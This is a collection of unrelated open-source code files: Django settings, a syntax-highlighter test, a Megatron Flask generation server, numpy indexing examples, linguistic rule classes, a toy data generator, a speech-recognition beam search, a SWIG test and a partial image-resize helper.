# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'zh-cn'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = False
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
REST_FRAMEWORK = {
# Use Django's standard `django.contrib.auth` permissions,
# or allow read-only access for unauthenticated users.
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
],
'PAGE_SIZE': 20,
'DEFAULT_AUTHENTICATION_CLASSES': (
'oauth2_provider.ext.rest_framework.OAuth2Authentication',
)
}
STATIC_ROOT= '/var/www/iosblog/static'
MEDIA_ROOT = '/var/www/iosblog/media'
if DEBUG:
MEDIA_URL = '/media/'
else:
MEDIA_URL = 'http://iosblog.cc/media/'
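# Deployment note (the server command is illustrative): the production branch above is
# selected through the environment, e.g.
#   IOSBLOGRUNMODE=production gunicorn iosblog.wsgi:application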
|
test/numbers/complex1.py
|
kylebarron/MagicPython
| 1,482 |
101815
|
3.14j
10.j
10j
.001j
1e100j
3.14e-10j
3.14 : constant.numeric.float.python, source.python
j : constant.numeric.float.python, source.python, storage.type.imaginary.number.python
10. : constant.numeric.float.python, source.python
j : constant.numeric.float.python, source.python, storage.type.imaginary.number.python
10 : constant.numeric.dec.python, source.python
j : constant.numeric.dec.python, source.python, storage.type.imaginary.number.python
.001 : constant.numeric.float.python, source.python
j : constant.numeric.float.python, source.python, storage.type.imaginary.number.python
1e100 : constant.numeric.float.python, source.python
j : constant.numeric.float.python, source.python, storage.type.imaginary.number.python
3.14e-10 : constant.numeric.float.python, source.python
j : constant.numeric.float.python, source.python, storage.type.imaginary.number.python
|
megatron/text_generation_server.py
|
zhisbug/Megatron-LM
| 2,869 |
101816
|
<gh_stars>1000+
# coding=utf-8
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import torch
import json
import threading
from flask import Flask, request, jsonify, current_app
from flask_restful import Resource, Api
from megatron import get_args
from megatron import mpu
from megatron.text_generation_utils import generate
GENERATE_NUM = 0
lock = threading.Lock()
class MegatronGenerate(Resource):
def __init__(self, model):
self.model = model
@staticmethod
def send_do_generate():
choice = torch.cuda.LongTensor([GENERATE_NUM])
torch.distributed.broadcast(choice, 0)
def put(self):
args = get_args()
print("request IP: " + str(request.remote_addr))
print(json.dumps(request.get_json()),flush=True)
print("current time: ", datetime.datetime.now())
sentences = request.get_json()["sentences"]
if len(sentences) > 128:
return "Maximum number of sentences is 128", 400
tokens_to_generate = 64 # Choosing hopefully sane default. Full sequence is slow
if "tokens_to_generate" in request.get_json():
tokens_to_generate = request.get_json()["tokens_to_generate"]
if not isinstance(tokens_to_generate, int):
return "tokens_to_generate must be an integer greater than 0"
if tokens_to_generate < 1:
return "tokens_to_generate must be an integer greater than 0"
all_probs = False
if "all_probs" in request.get_json():
all_probs = request.get_json()["all_probs"]
if not isinstance(all_probs, bool):
return "all_probs must be a boolean value"
temperature = args.temperature
if "temperature" in request.get_json():
temperature = request.get_json()["temperature"]
if not (type(temperature) == int or type(temperature) == float):
return "temperature must be a positive number less than or equal to 100.0"
if not (0.0 < temperature <= 100.0):
return "temperature must be a positive number less than or equal to 100.0"
add_BOS = False
if "add_BOS" in request.get_json():
add_BOS = request.get_json()["add_BOS"]
if not isinstance(add_BOS, bool):
return "add_BOS must be a boolean value"
with lock: # Need to get lock to keep multiple threads from hitting code
MegatronGenerate.send_do_generate() # Tell other ranks we're doing generate
resp_sentences, resp_sentences_seg, output_logits, full_logits, tokens = generate(self.model, sentences, tokens_to_generate, all_probs, temperature, add_BOS)
if all_probs:
return jsonify({"sentences": resp_sentences,
"segments": resp_sentences_seg,
"logits": output_logits,
"all_logits": full_logits,
"tokens": tokens})
return jsonify({"sentences": resp_sentences,
"segments": resp_sentences_seg,
"logits": output_logits})
class MegatronServer(object):
def __init__(self, model):
self.app = Flask(__name__, static_url_path='')
api = Api(self.app)
api.add_resource(MegatronGenerate, '/generate', resource_class_args=[model])
def run(self, url):
self.app.run(url, threaded=True, debug=False)
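# A minimal client-side sketch; the host/port and payload values are illustrative, while the
# '/generate' endpoint and the JSON keys match MegatronGenerate.put above.
#
#   import requests
#   resp = requests.put("http://localhost:5000/generate",
#                       json={"sentences": ["Hello world"], "tokens_to_generate": 16})
#   print(resp.json()["sentences"])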
|
butterflow/version.py
|
changhaitravis/butterflow
| 1,340 |
101817
|
__version__ = '0.2.4a4'
|
notebook/numpy_fancy_indexing.py
|
vhn0912/python-snippets
| 174 |
101827
|
import numpy as np
a = np.arange(10) * 10
print(a)
# [ 0 10 20 30 40 50 60 70 80 90]
print(a[5])
# 50
print(a[8])
# 80
print(a[[5, 8]])
# [50 80]
print(a[[5, 4, 8, 0]])
# [50 40 80 0]
print(a[[5, 5, 5, 5]])
# [50 50 50 50]
idx = np.array([[5, 4], [8, 0]])
print(idx)
# [[5 4]
# [8 0]]
print(a[idx])
# [[50 40]
# [80 0]]
# print(a[[[5, 4], [8, 0]]])
# IndexError: too many indices for array
print(a[[[[5, 4], [8, 0]]]])
# [[50 40]
# [80 0]]
a_2d = np.arange(12).reshape((3, 4))
print(a_2d)
# [[ 0 1 2 3]
# [ 4 5 6 7]
# [ 8 9 10 11]]
print(a_2d[0])
# [0 1 2 3]
print(a_2d[2])
# [ 8 9 10 11]
print(a_2d[[2, 0]])
# [[ 8 9 10 11]
# [ 0 1 2 3]]
print(a_2d[[2, 2, 2]])
# [[ 8 9 10 11]
# [ 8 9 10 11]
# [ 8 9 10 11]]
print(a_2d[:, 1])
# [1 5 9]
print(a_2d[:, 3])
# [ 3 7 11]
print(a_2d[:, 1:2])
# [[1]
# [5]
# [9]]
print(a_2d[:, [3, 1]])
# [[ 3 1]
# [ 7 5]
# [11 9]]
print(a_2d[:, [3, 3, 3]])
# [[ 3 3 3]
# [ 7 7 7]
# [11 11 11]]
print(a_2d[0, 1])
# 1
print(a_2d[2, 3])
# 11
print(a_2d[[0, 2], [1, 3]])
# [ 1 11]
# index
# [[0, 1] [2, 3]]
# print(a_2d[[0, 2, 1], [1, 3]])
# IndexError: shape mismatch: indexing arrays could not be broadcast together with shapes (3,) (2,)
print(a_2d[[[0, 0], [2, 2]], [[1, 3], [1, 3]]])
# [[ 1 3]
# [ 9 11]]
# index
# [[0, 1] [0, 3]
# [2, 1] [2, 3]]
print(a_2d[[[0], [2]], [1, 3]])
# [[ 1 3]
# [ 9 11]]
idxs = np.ix_([0, 2], [1, 3])
print(idxs)
# (array([[0],
# [2]]), array([[1, 3]]))
print(type(idxs))
# <class 'tuple'>
print(type(idxs[0]))
# <class 'numpy.ndarray'>
print(idxs[0])
# [[0]
# [2]]
print(idxs[1])
# [[1 3]]
print(a_2d[np.ix_([0, 2], [1, 3])])
# [[ 1 3]
# [ 9 11]]
print(a_2d[np.ix_([2, 0], [3, 3, 3])])
# [[11 11 11]
# [ 3 3 3]]
print(a_2d[[0, 2]][:, [1, 3]])
# [[ 1 3]
# [ 9 11]]
a_2d = np.arange(12).reshape((3, 4))
print(a_2d)
# [[ 0 1 2 3]
# [ 4 5 6 7]
# [ 8 9 10 11]]
a_2d[np.ix_([0, 2], [1, 3])] = 100
print(a_2d)
# [[ 0 100 2 100]
# [ 4 5 6 7]
# [ 8 100 10 100]]
a_2d[np.ix_([0, 2], [1, 3])] = [100, 200]
print(a_2d)
# [[ 0 100 2 200]
# [ 4 5 6 7]
# [ 8 100 10 200]]
a_2d[np.ix_([0, 2], [1, 3])] = [[100, 200], [300, 400]]
print(a_2d)
# [[ 0 100 2 200]
# [ 4 5 6 7]
# [ 8 300 10 400]]
print(a_2d[[0, 2]][:, [1, 3]])
# [[100 200]
# [300 400]]
a_2d[[0, 2]][:, [1, 3]] = 0
print(a_2d)
# [[ 0 100 2 200]
# [ 4 5 6 7]
# [ 8 300 10 400]]
a_2d = np.arange(12).reshape((3, 4))
print(a_2d)
# [[ 0 1 2 3]
# [ 4 5 6 7]
# [ 8 9 10 11]]
a_2d[[2, 0]] = [[100, 200, 300, 400], [500, 600, 700, 800]]
print(a_2d)
# [[500 600 700 800]
# [ 4 5 6 7]
# [100 200 300 400]]
a_2d[[2, 2]] = [[-1, -2, -3, -4], [-5, -6, -7, -8]]
print(a_2d)
# [[500 600 700 800]
# [ 4 5 6 7]
# [ -5 -6 -7 -8]]
a_2d = np.arange(12).reshape((3, 4))
print(a_2d)
# [[ 0 1 2 3]
# [ 4 5 6 7]
# [ 8 9 10 11]]
a_fancy = a_2d[np.ix_([0, 2], [1, 3])]
print(a_fancy)
# [[ 1 3]
# [ 9 11]]
a_fancy[0, 0] = 100
print(a_fancy)
# [[100 3]
# [ 9 11]]
print(a_2d)
# [[ 0 1 2 3]
# [ 4 5 6 7]
# [ 8 9 10 11]]
a_2d = np.arange(12).reshape((3, 4))
print(a_2d)
# [[ 0 1 2 3]
# [ 4 5 6 7]
# [ 8 9 10 11]]
print(a_2d[[2, 0], ::-1])
# [[11 10 9 8]
# [ 3 2 1 0]]
print(a_2d[::2, [3, 0, 1]])
# [[ 3 0 1]
# [11 8 9]]
|
predpatt/rules.py
|
spyysalo/PredPatt
| 114 |
101834
|
from __future__ import print_function
class Rule(object):
def __init__(self):
pass
def __repr__(self):
return self.name()
@classmethod
def name(cls):
return cls.__name__.split('.')[-1]
@classmethod
def explain(cls):
return cls.__doc__
def __cmp__(self, other):
return cmp(unicode(self), unicode(other))
class PredicateRootRule(Rule):
rule_type = 'predicate_root'
class ArgumentRootRule(Rule):
rule_type = 'argument_root'
class PredConjRule(Rule):
type = 'predicate_conj'
class ArgumentResolution(Rule):
type = 'argument_resolution'
class ConjunctionResolution(Rule):
type = 'conjunction_resolution'
class SimplifyRule(Rule):
type = 'simple'
#______________________________________________
# Predicate root identification
class a1(PredicateRootRule):
"Extract a predicate token from the dependent of clausal relation {ccomp, csub, csubjpass}."
rule_type = 'predicate_root'
class a2(PredicateRootRule):
"Extract a predicate token from the dependent of clausal complement 'xcomp'."
rule_type = 'predicate_root'
class b(PredicateRootRule):
"Extract a predicate token from the dependent of clausal modifier."
rule_type = 'predicate_root'
class c(PredicateRootRule):
"Extract a predicate token from the governor of the relations {nsubj, nsubjpass, dobj, iobj, ccomp, xcomp, advcl}."
rule_type = 'predicate_root'
def __init__(self, e):
super(c, self).__init__()
self.e = e
def __repr__(self):
return "add_root(%s)_for_%s_from_(%s)" % (self.e.gov, self.e.rel, self.e.dep)
class d(PredicateRootRule):
"Extract a predicate token from the dependent of apposition."
rule_type = 'predicate_root'
class e(PredicateRootRule):
"Extract a predicate token from the dependent of an adjectival modifier."
rule_type = 'predicate_root'
class v(PredicateRootRule):
"Extract a predicate token from the dependent of the possessive relation 'nmod:poss' (English specific)."
rule_type = 'predicate_root'
class f(PredicateRootRule):
"Extract a conjunct token of a predicate token."
rule_type = 'predicate_root'
#_________________________________________
# Argument root identification
class g1(ArgumentRootRule):
"Extract an argument token from the dependent of the following relations {nsubj, nsubjpass, dobj, iobj}."
def __init__(self, edge):
self.edge = edge
super(g1, self).__init__()
def __repr__(self):
return 'g1(%s)' % (self.edge.rel)
class h1(ArgumentRootRule):
"Extract an argument token, which directly depends on the predicate token, from the dependent of the relations {nmod, nmod:npmod, nmod:tmod}."
class h2(ArgumentRootRule):
"Extract an argument token, which indirectly depends on the predicate token, from the dependent of the relations {nmod, nmod:npmod, nmod:tmod}."
class i(ArgumentRootRule):
"Extract an argument token from the governor of an adjectival modifier."
class j(ArgumentRootRule):
"Extract an argument token from the governor of apposition."
class w1(ArgumentRootRule):
"Extract an argument token from the governor of 'nmod:poss' (English specific)."
class w2(ArgumentRootRule):
"Extract an argument token from the dependent of 'nmod:poss' (English specific)."
class k(ArgumentRootRule):
"Extract an argument token from the dependent of the dependent of clausal complement 'ccomp'."
#__________________________________
# Predicate conjunction resolution
class pred_conj_borrow_aux_neg(PredConjRule):
"Borrow aux and neg tokens from conjoined predicate's name."
def __init__(self, friend, borrowed_token):
super(pred_conj_borrow_aux_neg, self).__init__()
self.friend = friend
self.borrowed_token = borrowed_token
class pred_conj_borrow_tokens_xcomp(PredConjRule):
"Borrow tokens from xcomp in a conjunction or predicates."
def __init__(self, friend, borrowed_token):
super(pred_conj_borrow_tokens_xcomp, self).__init__()
self.friend = friend
self.borrowed_token = borrowed_token
class cut_borrow_other(ArgumentResolution):
def __init__(self, borrowed, friend):
super(cut_borrow_other, self).__init__()
self.friend = friend
self.borrowed = borrowed
class cut_borrow_subj(ArgumentResolution):
def __init__(self, subj, friend):
super(cut_borrow_subj, self).__init__()
self.friend = friend
self.subj = subj
def __repr__(self):
return 'cut_borrow_subj(%s)_from(%s)' % (self.subj.root, self.friend.root)
class cut_borrow_obj(ArgumentResolution):
def __init__(self, obj, friend):
super(cut_borrow_obj, self).__init__()
self.friend = friend
self.obj = obj
def __repr__(self):
return 'cut_borrow_obj(%s)_from(%s)' % (self.obj.root, self.friend.root)
class borrow_subj(ArgumentResolution):
"Borrow subject from governor in (conj, xcomp of conj root, and advcl)."
# if gov_rel=='conj' and missing a subject, try to borrow the subject from
# the other event. Still no subject. Try looking at xcomp of conjunction
# root.
#
# if gov_rel==advcl and not event.has_subj() then borrow from governor.
def __init__(self, subj, friend):
super(borrow_subj, self).__init__()
self.subj = subj
self.friend = friend
def __repr__(self):
return 'borrow_subj(%s)_from(%s)' % (self.subj.root, self.friend.root)
# return 'borrow_subj(%s,%s,%s,%s)' % (self.i, self.event.root, self.friend.root, self.event.root.gov_rel)
# return 'borrow_subj(%s,%s)' % (self.friend, self.friend.subj())
class borrow_obj(ArgumentResolution):
"Borrow subject from governor in (conj, xcomp of conj root, and advcl)."
# if gov_rel=='conj' and missing a subject, try to borrow the subject from
# the other event. Still no subject. Try looking at xcomp of conjunction
# root.
#
# if gov_rel==advcl and not event.has_subj() then borrow from governor.
def __init__(self, obj, friend):
super(borrow_obj, self).__init__()
self.obj = obj
self.friend = friend
def __repr__(self):
return 'borrow_obj(%s)_from(%s)' % (self.obj.root, self.friend.root)
class share_argument(ArgumentResolution):
"Create an argument sharing tokens with another argument."
#___________________________
# Relative clause
class arg_resolve_relcl(ArgumentResolution):
"""Resolve argument of a predicate inside a relative clause. The missing
argument that we take is rooted at the governor of the `acl` dependency
relation (type acl:*) pointing at the embedded predicate.
"""
class pred_resolve_relcl(ArgumentResolution):
"Predicate has an argument from relcl resolution (`arg_resolve_relcl`)."
#__________________________________________
# Rules for post added argument root token.
class l(ArgumentResolution):
"Merge the argument token set of xcomp's dependent to the argument token set of the real predicate token."
class m(ConjunctionResolution):
"Extract a conjunct token of the argument root token."
#_________________________________________
# Predicate phrase
class PredPhraseRule(Rule):
type = 'pred_phrase'
def __init__(self, x):
self.x = x
super(PredPhraseRule, self).__init__()
# def __repr__(self):
# return '%s(%s)' % (super(PredPhraseRule, self).__repr__(), self.x)
class n1(PredPhraseRule):
"Extract a token from the subtree of the predicate root token, and add it to the predicate phrase."
class n6(PredPhraseRule):
"Add a case phrase to the predicate phrase."
class n2(PredPhraseRule):
"Drop a token, which is an argument root token, from the subtree of the predicate root token."
class n3(PredPhraseRule):
"Drop a token, which is another predicate root token, from the subtree of the predicate root token."
class n4(PredPhraseRule):
"Drop a token, which is the dependent of the relations set {ccomp, csubj, advcl, acl, acl:relcl, nmod:tmod, parataxis, appos, dep}, from the subtree of the predicate root token."
class n5(PredPhraseRule):
"Drop a token, which is a conjunct of the predicate root token or a conjunct of a xcomp's dependent token, from the subtree of the predicate root token."
#______________________________________
# Rules for extracting argument phrase.
class ArgPhraseRule(Rule):
type = 'arg_phrase'
class clean_arg_token(ArgPhraseRule):
"Extract a token from the subtree of the argument root token, and add it to the argument phrase."
def __init__(self, x):
super(clean_arg_token, self).__init__()
self.x = x
def __repr__(self):
return "clean_arg_token(%s)" %(self.x)
class move_case_token_to_pred(ArgPhraseRule):
"Extract a case token from the subtree of the argument root token."
def __init__(self, x):
super(move_case_token_to_pred, self).__init__()
self.x = x
def __repr__(self):
return "move_case_token(%s)_to_pred" %(self.x)
class predicate_has(ArgPhraseRule):
"Drop a token, which is a predicate root token, from the subtree of the argument root token."
def __init__(self, x):
super(predicate_has, self).__init__()
self.x = x
def __repr__(self):
return "predicate_has(%s)" %(self.x)
class drop_appos(ArgPhraseRule):
def __init__(self, x):
super(drop_appos, self).__init__()
self.x = x
def __repr__(self):
return "drop_appos(%s)" %(self.x)
class drop_unknown(ArgPhraseRule):
def __init__(self, x):
super(drop_unknown, self).__init__()
self.x = x
def __repr__(self):
return "drop_unknown(%s)" %(self.x)
class drop_cc(ArgPhraseRule):
"Drop the argument's cc (coordinating conjunction) from the subtree of the argument root token."
def __init__(self, x):
super(drop_cc, self).__init__()
self.x = x
def __repr__(self):
return "drop_cc(%s)" %(self.x)
class drop_conj(ArgPhraseRule):
"Drop the argument's conjuct from the subtree of the argument root token."
def __init__(self, x):
super(drop_conj, self).__init__()
self.x = x
def __repr__(self):
return "drop_conj(%s)" %(self.x)
class special_arg_drop_direct_dep(ArgPhraseRule):
def __init__(self, x):
super(special_arg_drop_direct_dep, self).__init__()
self.x = x
def __repr__(self):
return "special_arg_drop_direct_dep(%s)" %(self.x)
class embedded_advcl(ArgPhraseRule):
def __init__(self, x):
super(embedded_advcl, self).__init__()
self.x = x
def __repr__(self):
return "drop_embedded_advcl(%s)" %(self.x)
class embedded_ccomp(ArgPhraseRule):
def __init__(self, x):
super(embedded_ccomp, self).__init__()
self.x = x
def __repr__(self):
return "drop_embedded_ccomp(%s)" %(self.x)
class embedded_unknown(ArgPhraseRule):
def __init__(self, x):
super(embedded_unknown, self).__init__()
self.x = x
def __repr__(self):
return "drop_embedded_unknown(%s)" %(self.x)
#________________________________
# Rules for simple predicate.
class p1(SimplifyRule):
"Remove a non-core argument, a nominal modifier, from the predpatt."
class p2(SimplifyRule):
"Remove an argument of other type from the predpatt."
class q(SimplifyRule):
"Remove an adverbial modifier in the predicate phrase."
class r(SimplifyRule):
"Remove auxiliary in the predicate phrase."
#____________________________________________________
# Rules for manually added tokens (English specific)
class u(Rule):
"Strip the punct in the phrase."
#____________________________________________________
# English-specific rules
class LanguageSpecific(Rule):
lang = None
class EnglishSpecific(Rule):
lang = 'English'
class en_relcl_dummy_arg_filter(EnglishSpecific):
def __init__(self):
super(en_relcl_dummy_arg_filter, self).__init__()
if __name__ == '__main__':
print(a1(), a1().explain())
|
bnpy/datasets/zzz_unsupported/JainNealEx1.py
|
jun2tong/bnp-anomaly
| 184 |
101841
|
<filename>bnpy/datasets/zzz_unsupported/JainNealEx1.py
'''
JainNealEx1.py
Toy binary data from K=5 states.
Usage
---------
To take a look at the states, just run this script as an executable.
$ python JainNealEx1.py
'''
import numpy as np
import scipy.linalg
from bnpy.data import XData
def get_short_name():
''' Return short string used in filepaths to store solutions
'''
return 'JainNealEx1'
def get_data_info():
return 'Toy Binary Data. K=%d true clusters. D=%d.' % (K, D)
def get_data(seed=8675309, nObsTotal=None, nPerState=20, **kwargs):
'''
Args
-------
seed : integer seed for random number generator,
used for actually *generating* the data
nObsTotal : total number of observations for the dataset.
Returns
-------
Data : bnpy XData object, with nObsTotal observations
'''
if nObsTotal is not None:
nPerState = nObsTotal // K
X, TrueZ = genToyData(seed=seed, nPerState=nPerState)
Data = XData(X=X, TrueZ=TrueZ)
Data.name = get_short_name()
Data.summary = get_data_info()
return Data
# True cluster emission probabilities
#######################################################
K = 5
D = 6
phi = np.asarray([
[.95, .95, .95, .95, .95, .95],
[.05, .05, .05, .05, .95, .95],
[.95, .05, .05, .95, .95, .95],
[.05, .05, .05, .05, .05, .05],
[.95, .95, .95, .95, .05, .05],
])
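# phi[k, d] is the probability that feature d equals 1 for a sample drawn from state k (see genToyData below).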
def genToyData(seed=1234, nPerState=20):
'''
'''
prng = np.random.RandomState(seed)
X = np.zeros((K * nPerState, D))
Z = np.zeros(K * nPerState)
for k in range(K):
start = k * nPerState
stop = (k + 1) * nPerState
X[start:stop] = prng.rand(nPerState, D) < phi[k][np.newaxis, :]
Z[start:stop] = k * np.ones(nPerState)
return X, Z
if __name__ == '__main__':
from matplotlib import pylab
rcParams = pylab.rcParams
rcParams['ps.fonttype'] = 42
rcParams['ps.useafm'] = True
rcParams['xtick.labelsize'] = 15
rcParams['ytick.labelsize'] = 15
rcParams['font.size'] = 25
X, Z = genToyData()
pylab.imshow(X, aspect=X.shape[1] / float(X.shape[0]),
interpolation='nearest', cmap='bone')
pylab.show(block=True)
|
otrans/recognize/speech2text.py
|
jiyanglii/OpenTransformer
| 321 |
101858
|
<filename>otrans/recognize/speech2text.py
import torch
from otrans.data import EOS, BOS
from otrans.recognize.base import Recognizer
from packaging import version
class SpeechToTextRecognizer(Recognizer):
def __init__(self, model, lm=None, lm_weight=0.1, ctc_weight=0.0, beam_width=5, nbest=1,
max_len=50, idx2unit=None, penalty=0, lamda=5, ngpu=1, apply_cache=False):
super(SpeechToTextRecognizer, self).__init__(model, idx2unit, lm, lm_weight, ngpu)
self.beam_width = beam_width
self.max_len = max_len
self.nbest = nbest
self.penalty = penalty
self.lamda = lamda
self.ctc_weight = ctc_weight
self.lm_weight = lm_weight
self.attn_weights = {}
self.apply_cache = False
def encode(self, inputs, inputs_mask, cache=None):
new_cache = {}
inputs, inputs_mask, fe_cache = self.model.frontend.inference(inputs, inputs_mask, cache['frontend'] if cache is not None else None)
new_cache['frontend'] = fe_cache
# memory, memory_mask, enc_cache, enc_attn_weights = self.model.encoder.inference(inputs, inputs_mask, cache['encoder'] if cache is not None else None)
memory, memory_mask, enc_attn_weights = self.model.encoder(inputs, inputs_mask)
# new_cache['encoder'] = enc_cache
return memory, memory_mask, new_cache, enc_attn_weights
def decode(self, preds, memory, memory_mask, cache=None):
log_probs, dec_cache, dec_attn_weights = self.model.decoder.inference(preds, memory, memory_mask, cache)
return log_probs, dec_cache, dec_attn_weights
def recognize(self, inputs, inputs_mask):
        cache = {'frontend': None, 'encoder': None, 'decoder': None, 'lm': None}
self.attn_weights = {}
memory, memory_mask, _, enc_attn_weights = self.encode(inputs, inputs_mask)
self.attn_weights['encoder'] = enc_attn_weights
self.attn_weights['decoder'] = []
b, t, v = memory.size()
beam_memory = memory.unsqueeze(1).repeat([1, self.beam_width, 1, 1]).view(b * self.beam_width, t, v)
beam_memory_mask = memory_mask.unsqueeze(1).repeat([1, self.beam_width, 1]).view(b * self.beam_width, t)
preds = torch.ones([b * self.beam_width, 1], dtype=torch.long, device=memory.device) * BOS
scores = torch.FloatTensor([0.0] + [-float('inf')] * (self.beam_width - 1))
scores = scores.to(memory.device).repeat([b]).unsqueeze(1)
ending_flag = torch.zeros_like(scores, dtype=torch.bool)
with torch.no_grad():
for _ in range(1, self.max_len+1):
preds, cache, scores, ending_flag = self.decode_step(
preds, beam_memory, beam_memory_mask, cache, scores, ending_flag)
# whether stop or not
if ending_flag.sum() == b * self.beam_width:
break
scores = scores.view(b, self.beam_width)
preds = preds.view(b, self.beam_width, -1)
lengths = torch.sum(torch.ne(preds, EOS).float(), dim=-1)
# length penalty
if self.penalty:
lp = torch.pow((self.lamda + lengths) /
(self.lamda + 1), self.penalty)
scores /= lp
sorted_scores, offset_indices = torch.sort(scores, dim=-1, descending=True)
base_indices = torch.arange(b, dtype=torch.long, device=offset_indices.device) * self.beam_width
base_indices = base_indices.unsqueeze(1).repeat([1, self.beam_width]).view(-1)
preds = preds.view(b * self.beam_width, -1)
indices = offset_indices.view(-1) + base_indices
# remove BOS
sorted_preds = preds[indices].view(b, self.beam_width, -1)
nbest_preds = sorted_preds[:, :min(self.beam_width, self.nbest), 1:]
nbest_scores = sorted_scores[:, :min(self.beam_width, self.nbest)]
return self.nbest_translate(nbest_preds), nbest_scores
def decode_step(self, preds, memory, memory_mask, cache, scores, flag):
""" decode an utterance in a stepwise way"""
batch_size = int(scores.size(0) / self.beam_width)
batch_log_probs, dec_cache, dec_attn_weights = self.decode(preds, memory, memory_mask, cache['decoder'])
if self.lm is not None:
batch_lm_log_probs, lm_hidden = self.lm_decode(preds, cache['lm'])
batch_lm_log_probs = batch_lm_log_probs.squeeze(1)
batch_log_probs = batch_log_probs + self.lm_weight * batch_lm_log_probs
else:
lm_hidden = None
if batch_log_probs.dim() == 3:
batch_log_probs = batch_log_probs.squeeze(1)
last_k_scores, last_k_preds = batch_log_probs.topk(self.beam_width)
last_k_scores = mask_finished_scores(last_k_scores, flag)
last_k_preds = mask_finished_preds(last_k_preds, flag)
# update scores
scores = scores + last_k_scores
scores = scores.view(batch_size, self.beam_width * self.beam_width)
# pruning
scores, offset_k_indices = torch.topk(scores, k=self.beam_width)
scores = scores.view(-1, 1)
device = scores.device
base_k_indices = torch.arange(batch_size, device=device).view(-1, 1).repeat([1, self.beam_width])
base_k_indices *= self.beam_width ** 2
best_k_indices = base_k_indices.view(-1) + offset_k_indices.view(-1)
# update predictions
best_k_preds = torch.index_select(
last_k_preds.view(-1), dim=-1, index=best_k_indices)
if version.parse(torch.__version__) < version.parse('1.6.0'):
preds_index = best_k_indices.div(self.beam_width)
else:
preds_index = best_k_indices.floor_divide(self.beam_width)
preds_symbol = torch.index_select(
preds, dim=0, index=preds_index)
preds_symbol = torch.cat(
(preds_symbol, best_k_preds.view(-1, 1)), dim=1)
# dec_hidden = reselect_hidden_list(dec_hidden, self.beam_width, best_k_indices)
# lm_hidden = reselect_hidden_list(lm_hidden, self.beam_width, best_k_indices)
# finished or not
end_flag = torch.eq(preds_symbol[:, -1], EOS).view(-1, 1)
# hidden = {
# 'decoder': dec_hidden,
# 'lm': lm_hidden
# }
return preds_symbol, cache, scores, end_flag
def mask_finished_scores(score, flag):
"""
If a sequence is finished, we only allow one alive branch. This function aims to give one branch a zero score
and the rest -inf score.
Args:
score: A real value array with shape [batch_size * beam_size, beam_size].
flag: A bool array with shape [batch_size * beam_size, 1].
Returns:
A real value array with shape [batch_size * beam_size, beam_size].
"""
beam_width = score.size(-1)
zero_mask = torch.zeros_like(flag, dtype=torch.bool)
if beam_width > 1:
unfinished = torch.cat(
(zero_mask, flag.repeat([1, beam_width - 1])), dim=1)
finished = torch.cat(
(flag.bool(), zero_mask.repeat([1, beam_width - 1])), dim=1)
else:
unfinished = zero_mask
finished = flag.bool()
score.masked_fill_(unfinished, -float('inf'))
score.masked_fill_(finished, 0)
return score
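# Worked example with beam_width = 2 (values are illustrative): a finished hypothesis keeps
# exactly one alive branch with score 0 while the other branch is pushed to -inf:
#   score = tensor([[0.1, 0.2]]), flag = tensor([[True]])
#   mask_finished_scores(score, flag) -> tensor([[0.0, -inf]])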
def mask_finished_preds(pred, flag):
"""
If a sequence is finished, all of its branch should be </S> (3).
Args:
pred: A int array with shape [batch_size * beam_size, beam_size].
flag: A bool array with shape [batch_size * beam_size, 1].
Returns:
A int array with shape [batch_size * beam_size].
"""
beam_width = pred.size(-1)
finished = flag.repeat([1, beam_width])
return pred.masked_fill_(finished.bool(), EOS)
def reselect_hidden(tensor, beam_width, indices):
n_layers, batch_size, hidden_size = tensor.size()
tensor = tensor.transpose(0, 1).unsqueeze(1).repeat([1, beam_width, 1, 1])
tensor = tensor.reshape(batch_size * beam_width, n_layers, hidden_size)
new_tensor = torch.index_select(tensor, dim=0, index=indices)
new_tensor = new_tensor.transpose(0, 1).contiguous()
return new_tensor
def reselect_hidden_list(tensor_list, beam_width, indices):
if tensor_list is None:
return None
new_tensor_list = []
for tensor in tensor_list:
if isinstance(tensor, tuple):
h = reselect_hidden(tensor[0], beam_width, indices)
c = reselect_hidden(tensor[1], beam_width, indices)
new_tensor_list.append((h, c))
else:
new_tensor_list.append(reselect_hidden(tensor, beam_width, indices))
return new_tensor_list
|
cacreader/swig-4.0.2/Examples/test-suite/python/using_extend_runme.py
|
kyletanyag/LL-Smartcard
| 1,031 |
101908
|
from using_extend import *
f = FooBar()
if f.blah(3) != 3:
raise RuntimeError, "blah(int)"
if f.blah(3.5) != 3.5:
raise RuntimeError, "blah(double)"
if f.blah("hello") != "hello":
raise RuntimeError, "blah(char *)"
if f.blah(3, 4) != 7:
raise RuntimeError, "blah(int,int)"
if f.blah(3.5, 7.5) != (3.5 + 7.5):
raise RuntimeError, "blah(double,double)"
if f.duh(3) != 3:
raise RuntimeError, "duh(int)"
|
animeMusic_server/helper/image.py
|
waahah/animeMusic
| 287 |
101911
|
# -*- coding:utf-8 -*-
# Image-processing code based on http://fc-lamp.blog.163.com/blog/static/174566687201282424018946/ with minor modifications
from PIL import Image as image
def resizeImg(**args):
args_key = {'path': '', 'out_path': '', 'width': '', 'height': '', 'quality': 75}
arg = {}
for key in args_key:
if key in args:
arg[key] = args[key]
else:
arg[key] = None
im = image.open(arg['path'])
ori_w, ori_h = im.size
widthRatio = heightRatio = None
ratio = 1
if (arg['width'] and ori_w and ori_w > arg['width']) or (arg['height'] and ori_h and ori_h > arg['height']):
